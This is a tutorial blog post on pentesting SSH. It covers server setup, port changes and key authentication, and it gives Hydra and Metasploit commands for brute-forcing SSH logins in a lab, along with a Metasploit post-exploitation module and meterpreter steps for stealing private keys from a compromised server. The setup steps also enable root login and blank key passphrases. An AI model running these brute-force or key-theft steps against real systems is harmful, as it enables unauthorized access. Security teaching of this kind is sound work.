Pentesting SSH

What is SSH

Secure Shell or SSH is used to remotely access the server or any computer with SSH enabled. Perfect replacement for telnet protocol. Telnet is not secure like SSH, SSH provides encryption for secure communication. SSH by default uses TCP port 22 to connect with the SSH service. SSH will allow the client to connect the remote system through the command line.

Installing and configuring SSH Server

It’s very easy to install SSH in any system like Kali, Ubuntu or any other Linux system. I am using a Ubuntu system to install the ssh server.

apt-get install openssh-server

With the help of the above command, you can install the ssh service in your system. Once your installation is finished type

service ssh start

and you can start the ssh service to confirm we will scan our IP address with Nmap for port 22

nmap -p 22 localhost -sV

Nmap will scan if port 22 is open or not and if yes then what service is running on that port. Once you confirm that SSH is running we can see what we can do to secure it which we should do during protesting. Let’s try to connect with our ubuntu server from a different system, Here my Ubuntu system IP address is 192.168.75.130

SSH Client

Here I am using a windows system to connect with our ubuntu. Windows has SSH client installed so we can use it with Powershell or CMD.

ssh [email protected]

Type the above command in your PowerShell/CMD and then enter your password root password. you will get permission denied error, It’s important to understand why. SSH by default won’t allow you to connect with the server as a root user, You can connect with it with any other user except root. Here in my ubuntu machine, I have another user allabouthack.

ssh [email protected]

again it will ask for the password of allabouthack user and after right credentials, I will be connected with the ubuntu system. Now I can do anything from my windows machine to the Ubuntu machine with the terminal of the ubuntu system.

SSH ROOT USER

Now as I said by default you can’t access the root user through SSH. To access the root user we have to do some configuration. We need to edit the ssh_config file from our ubuntu server.

nano /etc/ssh/sshd_config

From this file find PermitRootLogin without-password and replace it with PermitRootLogin yes then restart your SSH service with sudo service ssh restart and try again to connect to the root user with SSH, This time you can connect with the root user.

Changing the Default Port

Many times organization change the default port number for services. Which don’t make any sense except wasting the time of the attacker. If an attacker wants to target SSH service he will scan for Port 22 and if SSH is running on a different port then the attacker will think SSH is not running or has to scan more to find which port is running SSH.

nano /etc/ssh/sshd_config

Open the same config file and find Port 22 and change it to any port you want I am changing it to 1234 then restart the SSH service Sudo service ssh restart. To confirm that port is changed we can scan for port 22 and 1234.

Or we can try to connect with ssh on port 22 and we will get an error. When you run SSH on a different port you can’t use the above command to connect with it you have to specify the port ssh [email protected] -p 1234

SSH RSA KEY

SSH allows us to connect with the server without password with the help of RSA public and private key. It’s useful for a security reason. We can block the password-based authentication and authenticate with RSA key only, in this situation if the password is leaked or weak for directory attack still attacker can’t connect with it.

We need to create an RSA key pair of the public and private key. The public key will be saved on the server and private key inside the client machine. There are multiple ways and tools available to do this. First, we need to create the keys from our ubuntu server.

$ ssh-keygen
$ cd /root/.ssh
$ cp id_rsa.pub /root/.ssh/authorized_keys
$ ls

First, we will create the key with ssh-keygen, It will ask for the password for extra layer protection. Keep it blank, Now we will go to the ssh directory. And will copy the key into a different file with the cp command. now type ls and confirm it.

Now we need to transfer the id_rsa file into the client machine which is windows. You can use any method like drive, local server etc to transfer it. Now you have to move that file in your user location inside C drive C:\Users\Allabouthack\.ssh

Now you can try to connect with the SSH server, and it won’t ask or the password. But It will still take password so we have to block it so SSH will only accept the RSA key and will reject the password. We need to configure the ssh file

nano /etc/ssh/sshd_config

Now change the PasswordAuthentication yes with PasswordAuthentication no.

Password Attack

We can perform brute-force with hydra and Metasploit. I will show you how you can perform brute-force with both. Let’s take a look at how to perform it with hydra.

Hydra

hydra -l root -P password.txt 192.168.75.130 ssh -t 5 

First, we are using -l for the username, you can use -L if you have a list of usernames. Then we are using -P for password list location folwed by IP address service and the number of threads.

Metasploit

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.75.130
set USERPASS_FILE /home/pentesting/password.txt
set VERBOSE True
set USERNAME root
run

With the above options, you can perform brute-force with Metasploit, Again we are using single username if you have multiple usernames in a file then use USERPASS_FILE /home/password.txt. Obviously you have to change the location of wordlist.

There are lot’s of different things you can do while penetrating a server with SS enable like password attack as we have seen, Metasploit session with an SSH key, Stealing SSH keys.

Stealing SSH Keys

This attack requires a compromised server with SSH server running. If you are able to compromise a server with Metasploit and server has SSH running but require a key to connect with it. in that situation, you can steal the keys from the compromised server.

use post/multi/gather/ssh_creds
set session 4
exploit

Once you have compromised the server with Metasploit then run it in the background and run the above post exploit within your Metasploit and set your exploited server session id.

Once you find that you can get the key for that you have to start the session and download the key.

session 4
cd /home/username/.ssh
download id_rsa /home/

Once the key is downloaded you can find it in /home the directory. If you have the key then you can use it to connect with it as we saw earlier. There are lots of other things you can do with SSH you can check Metasploit use auxiliary/scanner/ssh to list all the options available.